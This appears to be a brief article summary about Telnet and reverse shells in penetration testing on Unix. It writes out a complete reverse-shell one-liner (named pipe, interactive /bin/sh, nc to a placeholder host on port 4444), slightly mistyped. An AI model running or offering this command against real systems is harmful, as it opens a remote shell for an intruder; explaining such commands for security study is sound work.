This article explains the behavior of Telnet in penetration testing, focusing on Unix systems and reverse shells. It covers a common command used in exploits: RUN rm/tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ip 4444 > /tmp/f.